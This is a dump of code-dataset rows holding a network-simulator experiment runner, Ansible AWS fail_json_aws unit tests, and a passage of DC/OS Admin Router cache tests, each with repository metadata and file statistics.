| 28 | 125 | 0.689286 | 40 | 280 | 4.825 | 0.525 | 0.26943 | 0.248705 | 0.264249 | 0.279793 | 0.279793 | 0.279793 | 0.279793 | 0.279793 | 0 | 0 | 0.082645 | 0.135714 | 280 | 9 | 126 | 31.111111 | 0.714876 | 0 | 0 | 0 | 1 | 0 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.285714 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c7cbb680595ec9bb564bf4a46d9de82f224a29de | 9,982 | py | Python | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | null | null | null | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | 1 | 2021-06-18T19:12:19.000Z | 2021-06-18T19:12:19.000Z | sim_prev/py/run_experiments.py | wuxian4118/YAPS | be77016c4ce6309be81c6fd0ce7b7f628a3fa29e | [
"BSD-3-Clause"
] | 1 | 2021-06-18T07:01:16.000Z | 2021-06-18T07:01:16.000Z | #!/usr/bin/python
import subprocess
import threading
import multiprocessing
import os
''' backup of an old config
conf_str_incast32 =
init_cwnd: 12
max_cwnd: 15
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: 1
use_random_jitter: 0
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast2 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 2
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast32 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_incast143 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 0
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all33 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 33
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 1
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
conf_str_all_to_all144 = '''init_cwnd: 2
max_cwnd: 30
retx_timeout: 450
queue_size: 524288
propagation_delay: 0.0000002
bandwidth: 100000000000.0
queue_type: 6
flow_type: 6
num_flow: {0}
num_hosts: 144
flow_trace: ./CDF_{1}.txt
cut_through: 1
mean_flow_size: 0
load_balancing: 0
preemptive_queue: 0
big_switch: 0
multi_switch: 0
host_type: 1
traffic_imbalance: 0
traffic_pattern: 1
disable_Veritas_cc: 0
load: 0.8
use_dynamic_load: 1
burst_load: 1.2
burst_size: {3}
use_random_jitter: 0
random_flow_start: {4}
reauth_limit: 3
magic_trans_slack: 1.1
magic_delay_scheduling: 1
use_flow_trace: 0
smooth_cdf: 0
bytes_mode: 1
burst_at_beginning: 0
capability_timeout: 1.5
capability_resend_timeout: 9
capability_initial: 8
capability_window: 8
capability_window_timeout: 25
ddc: 0
ddc_cpu_ratio: 0.33
ddc_mem_ratio: 0.33
ddc_disk_ratio: 0.34
ddc_normalize: 2
ddc_type: 0
deadline: 0
schedule_by_deadline: 0
avg_deadline: 0.0001
capability_third_level: 1
capability_fourth_level: 0
magic_inflate: 1
interarrival_cdf: none
num_host_types: 13
permutation_tm: 0
flushing_coefficient: 10
early_pkt_in_highest_prio: 0
cc_delay_target: 10
qos_weights: 4,1
qos_ratio: {2}
'''
#qos_ratio = ['10,90', '20,80', '30,70', '40,60', '50,50', '60,40', '70,30', '80,20', '90,10']
qos_ratio = ['50,50']
#runs = ['incast32', 'all_to_all33', 'incast143', 'all_to_all144'] # no need to run incast in the 144 node
#runs = ['incast32', 'all_to_all33']
runs = ['incast2']
#runs = ['all_to_all144']
#burst_size = [1]
#burst_size = [1,2,4,8,16,32,64,128,256,512]
burst_size = [1000,2000,3000,4000,5000,6000,7000,8000,9000,10000]
## create the "./config" and "./result" by yourself :(
template = '../simulator 1 ./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt > ./result/result_{0}_{1}_{2}_B{3}_{4}.txt'
cdf_temp = './CDF_{}.txt'
cdf_RPC = ['uniform_4K', 'uniform_32K']
def getNumLines(trace):
out = subprocess.check_output('wc -l {}'.format(trace), shell=True)
return int(out.split()[0])
def run_exp(str, semaphore):
semaphore.acquire()
print template.format(*str)
subprocess.call(template.format(*str), shell=True)
semaphore.release()
threads = []
semaphore = threading.Semaphore(multiprocessing.cpu_count())
#semaphore = threading.Semaphore(multiprocessing.cpu_count() / 2) # save my poor laptop
for r in runs:
for cdf in cdf_RPC:
for ratio in qos_ratio:
for burst in burst_size:
num_flow = 1000000
#num_flow = 5000000 # use a larger number for all_to_all144
random_flow_start = 0 # 1: means exponential randomness in flow start time
# generate conf file
if r == 'incast32':
conf_str = conf_str_incast32.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast2':
conf_str = conf_str_incast2.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all33':
conf_str = conf_str_all_to_all33.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'incast143':
conf_str = conf_str_incast143.format(num_flow, cdf, ratio, burst, random_flow_start)
elif r == 'all_to_all144':
conf_str = conf_str_all_to_all144.format(num_flow, cdf, ratio, burst, random_flow_start)
else:
assert False, r
# Note modify the config dir name
isrand = 'norand'
if (random_flow_start):
isrand = 'rand'
confFile = "./exp_config/conf_{0}_{1}_{2}_B{3}_{4}.txt".format(r, cdf, ratio.replace(',', '_'), burst, isrand)
with open(confFile, 'w') as f:
#print confFile
f.write(conf_str)
threads.append(threading.Thread(target=run_exp, args=((r, cdf, ratio.replace(',', '_'), burst, isrand), semaphore)))
print '\n'
[t.start() for t in threads]
[t.join() for t in threads]
print 'finished', len(threads), 'experiments'
| 22.381166 | 132 | 0.751252 | 1,680 | 9,982 | 4.122024 | 0.141071 | 0.015596 | 0.029458 | 0.019061 | 0.819783 | 0.805776 | 0.778051 | 0.776751 | 0.776751 | 0.77083 | 0 | 0.097884 | 0.152575 | 9,982 | 445 | 133 | 22.431461 | 0.720771 | 0.065117 | 0 | 0.842407 | 0 | 0.005731 | 0.727897 | 0.131698 | 0 | 0 | 0 | 0 | 0.002865 | 0 | null | null | 0 | 0.011461 | null | null | 0.008596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
c7e53afca023bfa089a8815a51ffd058793cdb3c | 15,431 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/amazon/aws/tests/unit/module_utils/core/ansible_aws_module/test_fail_json_aws.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z | # (c) 2020 Red Hat Inc.
#
# This file is part of Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
import botocore
import boto3
import json
from ansible.module_utils.common.dict_transformations import camel_dict_to_snake_dict
from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
class TestFailJsonAws(object):
    """Tests for AnsibleAWSModule.fail_json_aws() with ClientError and BotoCoreError."""

    # ========================================================
    # Prepare some data for use in our testing
    # ========================================================
    def setup_method(self):
        # Basic information that ClientError needs to spawn off an error
        self.EXAMPLE_EXCEPTION_DATA = {
            "Error": {
                "Code": "InvalidParameterValue",
                "Message": "The filter 'exampleFilter' is invalid"
            },
            "ResponseMetadata": {
                "RequestId": "01234567-89ab-cdef-0123-456789abcdef",
                "HTTPStatusCode": 400,
                "HTTPHeaders": {
                    "transfer-encoding": "chunked",
                    "date": "Fri, 13 Nov 2020 00:00:00 GMT",
                    "connection": "close",
                    "server": "AmazonEC2"
                },
                "RetryAttempts": 0
            }
        }
        self.CAMEL_RESPONSE = camel_dict_to_snake_dict(self.EXAMPLE_EXCEPTION_DATA.get("ResponseMetadata"))
        self.CAMEL_ERROR = camel_dict_to_snake_dict(self.EXAMPLE_EXCEPTION_DATA.get("Error"))
        # ClientError(EXAMPLE_EXCEPTION_DATA, "testCall") will generate this
        self.EXAMPLE_MSG = "An error occurred (InvalidParameterValue) when calling the testCall operation: The filter 'exampleFilter' is invalid"
        self.DEFAULT_CORE_MSG = "An unspecified error occurred"
        self.FAIL_MSG = "I Failed!"

    # ========================================================
    # Helpers shared by all test cases below
    # ========================================================
    def _client_error(self):
        """Return a fresh ClientError built from the example data."""
        return botocore.exceptions.ClientError(self.EXAMPLE_EXCEPTION_DATA, "testCall")

    def _run_fail_json_aws(self, monkeypatch, capfd, exception, *args, **kwargs):
        """Call fail_json_aws(exception, *args, **kwargs) on a minimal module.

        Pins the boto3/botocore versions, raises `exception` (so that it
        carries a traceback), asserts that fail_json_aws() exits with return
        code 1 and returns the module output parsed from JSON.
        """
        monkeypatch.setattr(botocore, "__version__", "1.2.3")
        monkeypatch.setattr(boto3, "__version__", "1.2.4")
        # Create a minimal module that we can call
        module = AnsibleAWSModule(argument_spec=dict())
        try:
            raise exception
        except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
            with pytest.raises(SystemExit) as ctx:
                module.fail_json_aws(e, *args, **kwargs)
            assert ctx.value.code == 1
        out, err = capfd.readouterr()
        return json.loads(out)

    def _assert_common_keys(self, return_val, expected_msg):
        """Check the keys fail_json_aws() always sets, whatever the exception type."""
        assert return_val.get("msg") == expected_msg
        assert return_val.get("boto3_version") == "1.2.4"
        assert return_val.get("botocore_version") == "1.2.3"
        assert return_val.get("exception") is not None
        assert return_val.get("failed")

    def _assert_client_error_keys(self, return_val, expected_msg):
        """ClientError metadata must be passed through, snake_cased."""
        self._assert_common_keys(return_val, expected_msg)
        assert return_val.get("response_metadata") == self.CAMEL_RESPONSE
        assert return_val.get("error") == self.CAMEL_ERROR

    def _assert_botocore_error_keys(self, return_val, expected_msg):
        """BotoCoreError carries no AWS metadata, so none must appear in the output."""
        self._assert_common_keys(return_val, expected_msg)
        assert "response_metadata" not in return_val
        assert "error" not in return_val

    # ========================================================
    # Passing fail_json_aws nothing more than a ClientError
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_client_minimal(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(monkeypatch, capfd, self._client_error())
        self._assert_client_error_keys(return_val, self.EXAMPLE_MSG)

    # ========================================================
    # Passing fail_json_aws a ClientError and a message
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_client_msg(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, self._client_error(), msg=self.FAIL_MSG)
        self._assert_client_error_keys(return_val, self.FAIL_MSG + ": " + self.EXAMPLE_MSG)

    # ========================================================
    # Passing fail_json_aws a ClientError and a message as a positional argument
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_client_positional_msg(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, self._client_error(), self.FAIL_MSG)
        self._assert_client_error_keys(return_val, self.FAIL_MSG + ": " + self.EXAMPLE_MSG)

    # ========================================================
    # Passing fail_json_aws a ClientError and an arbitrary key
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_client_key(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, self._client_error(), extra_key="Some Value")
        self._assert_client_error_keys(return_val, self.EXAMPLE_MSG)
        assert return_val.get("extra_key") == "Some Value"

    # ========================================================
    # Passing fail_json_aws a ClientError, an arbitrary key and a message
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_client_msg_and_key(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, self._client_error(),
            extra_key="Some Value", msg=self.FAIL_MSG)
        self._assert_client_error_keys(return_val, self.FAIL_MSG + ": " + self.EXAMPLE_MSG)
        assert return_val.get("extra_key") == "Some Value"

    # ========================================================
    # Passing fail_json_aws nothing more than a BotoCoreError
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_botocore_minimal(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, botocore.exceptions.BotoCoreError())
        self._assert_botocore_error_keys(return_val, self.DEFAULT_CORE_MSG)

    # ========================================================
    # Passing fail_json_aws a BotoCoreError and a message
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_botocore_msg(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, botocore.exceptions.BotoCoreError(), msg=self.FAIL_MSG)
        self._assert_botocore_error_keys(return_val, self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG)

    # ========================================================
    # Passing fail_json_aws a BotoCoreError and a message as a positional
    # argument
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_botocore_positional_msg(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, botocore.exceptions.BotoCoreError(), self.FAIL_MSG)
        self._assert_botocore_error_keys(return_val, self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG)

    # ========================================================
    # Passing fail_json_aws a BotoCoreError and an arbitrary key
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_botocore_key(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, botocore.exceptions.BotoCoreError(), extra_key="Some Value")
        self._assert_botocore_error_keys(return_val, self.DEFAULT_CORE_MSG)
        assert return_val.get("extra_key") == "Some Value"

    # ========================================================
    # Passing fail_json_aws a BotoCoreError, an arbitrary key and a message
    # ========================================================
    @pytest.mark.parametrize("stdin", [{}], indirect=["stdin"])
    def test_fail_botocore_msg_and_key(self, monkeypatch, stdin, capfd):
        return_val = self._run_fail_json_aws(
            monkeypatch, capfd, botocore.exceptions.BotoCoreError(),
            extra_key="Some Value", msg=self.FAIL_MSG)
        self._assert_botocore_error_keys(return_val, self.FAIL_MSG + ": " + self.DEFAULT_CORE_MSG)
        assert return_val.get("extra_key") == "Some Value"
| 47.92236 | 145 | 0.589528 | 1,750 | 15,431 | 4.983429 | 0.102857 | 0.086687 | 0.110079 | 0.132095 | 0.883385 | 0.873868 | 0.873868 | 0.873868 | 0.868134 | 0.868134 | 0 | 0.016385 | 0.224807 | 15,431 | 321 | 146 | 48.071651 | 0.712673 | 0.169075 | 0 | 0.822034 | 0 | 0 | 0.141962 | 0.006264 | 0 | 0 | 0 | 0 | 0.355932 | 1 | 0.04661 | false | 0 | 0.029661 | 0 | 0.080508 | 0.004237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c7efb68bfb3b66af4646f43eb56913cfa8d1c623 | 52,354 | py | Python | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | packages/adminrouter/extra/src/test-harness/tests/test_cache.py | rembik/dcos | 6ae0eed200e86f3ed30653696b97f8a637d59828 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import copy
import logging
import time
import pytest
import requests
from generic_test_code.common import ping_mesos_agent, verify_header
from mocker.endpoints.marathon import (
SCHEDULER_APP_ALWAYSTHERE,
SCHEDULER_APP_ALWAYSTHERE_DIFFERENTPORT,
)
from mocker.endpoints.mesos import AGENT1_ID, EXTRA_AGENT_DICT
from runner.common import CACHE_FIRST_POLL_DELAY, Vegeta
from util import GuardedSubprocess, LineBufferFilter, SearchCriteria
log = logging.getLogger(__name__)
class TestCache:
    def test_if_first_cache_refresh_occurs_earlier(
            self, nginx_class, mocker, valid_user_header):
        """Timer-driven first refresh fires after CACHE_FIRST_POLL_DELAY.

        cache_poll_period is set to 60s, yet the log filter (with a timeout of
        CACHE_FIRST_POLL_DELAY + 1) must already see all three caches being
        fetched — i.e. the first poll does not wait a full poll period.
        """
        filter_regexp = {
            'Executing cache refresh triggered by timer': SearchCriteria(1, False),
            'Cache `[\s\w]+` empty. Fetching.': SearchCriteria(3, True),
            'Mesos state cache has been successfully updated': SearchCriteria(1, True),
            'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
            'marathon leader cache has been successfully updated': SearchCriteria(1, True),
        }
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        # Enable recording for Mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')
        # Make regular polling occur later than usual, so that we get clear
        # results.
        ar = nginx_class(cache_poll_period=60, cache_expiration=55)
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=(CACHE_FIRST_POLL_DELAY + 1),
                                   line_buffer=ar.stderr_line_buffer)
            lbf.scan_log_buffer()
            # Do a request that uses cache so that we can verify that data was
            # in fact cached and no more than one req to mesos/marathon
            # backends were made
            ping_mesos_agent(ar, valid_user_header)
        mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                             func_name='get_recorded_requests')
        marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                func_name='get_recorded_requests')
        assert lbf.extra_matches == {}
        assert len(mesos_requests) == 1
        assert len(marathon_requests) == 2
    def test_if_cache_refresh_occurs_regularly(
            self, nginx_class, mocker, valid_user_header):
        """Timer keeps refreshing every cache in each cache_poll_period.

        Within first-poll-delay + two poll periods we expect three successful
        updates per cache; the recorded upstream requests confirm one Mesos
        request (and two Marathon requests) per refresh cycle.
        """
        filter_regexp = {
            'Executing cache refresh triggered by timer': SearchCriteria(3, False),
            'Cache `[\s\w]+` expired. Refresh.': SearchCriteria(8, True),
            'Mesos state cache has been successfully updated': SearchCriteria(3, True),
            'Marathon apps cache has been successfully updated': SearchCriteria(3, True),
            'marathon leader cache has been successfully updated': SearchCriteria(3, True),
        }
        cache_poll_period = 4
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        # Enable recording for mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')
        # Make regular polling occur faster than usual to speed up the tests.
        ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
        # In total, we should get three cache updates in given time frame:
        timeout = CACHE_FIRST_POLL_DELAY + cache_poll_period * 2 + 1
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=timeout,
                                   line_buffer=ar.stderr_line_buffer)
            lbf.scan_log_buffer()
            # Do a request that uses cache so that we can verify that data was
            # in fact cached and no more than one req to mesos/marathon
            # backends were made
            ping_mesos_agent(ar, valid_user_header)
        mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                             func_name='get_recorded_requests')
        marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                func_name='get_recorded_requests')
        assert lbf.extra_matches == {}
        assert len(mesos_requests) == 3
        assert len(marathon_requests) == 6
    def test_if_cache_refresh_is_triggered_by_request(
            self, nginx_class, mocker, valid_user_header):
        """An incoming request triggers the initial cache refresh.

        All timers are pushed far into the future (120s), so the only thing
        that can populate the empty caches right after Nginx has started is
        the request itself.
        """
        filter_regexp = {
            'Executing cache refresh triggered by request': SearchCriteria(1, True),
            'Cache `[\s\w]+` empty. Fetching.': SearchCriteria(3, True),
            'Mesos state cache has been successfully updated': SearchCriteria(1, True),
            'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
            'marathon leader cache has been successfully updated': SearchCriteria(1, True),
        }
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        # Enable recording for mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')
        # Make sure that timers will not interfere:
        ar = nginx_class(cache_first_poll_delay=120,
                         cache_poll_period=120,
                         cache_expiration=115)
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,
                                   line_buffer=ar.stderr_line_buffer)
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()
            # Do an extra request so that we can verify that data was in fact
            # cached and no more than one req to mesos/marathon backends were
            # made
            ping_mesos_agent(ar, valid_user_header)
        mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                             func_name='get_recorded_requests')
        marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                func_name='get_recorded_requests')
        assert lbf.extra_matches == {}
        assert len(mesos_requests) == 1
        assert len(marathon_requests) == 2
    def test_if_broken_marathon_causes_marathon_cache_to_expire_and_requests_to_fail(
            self, nginx_class, mocker, valid_user_header):
        """Past the hard limit, a stale `svcapps` cache makes /service fail with 503."""
        filter_regexp = {
            'Marathon app request failed: invalid response status: 500':
                SearchCriteria(1, False),
            'Mesos state cache has been successfully updated':
                SearchCriteria(2, False),
            'Cache entry `svcapps` is too old, aborting request':
                SearchCriteria(1, True),
        }
        ar = nginx_class(cache_max_age_soft_limit=3,
                         cache_max_age_hard_limit=4,
                         cache_expiration=2,
                         cache_poll_period=3,
                         )
        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            # Break marathon
            mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                func_name='always_bork',
                                aux_data=True)
            # Wait for the cache to be old enough to be discarded by AR:
            # cache_max_age_hard_limit + 1s for good measure
            # must be more than cache_poll_period
            time.sleep(4 + 1)
            # Perform the main/test request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 503
            lbf.scan_log_buffer()
        assert lbf.extra_matches == {}
    def test_if_temp_marathon_borkage_does_not_disrupt_caching(
            self, nginx_class, mocker, valid_user_header):
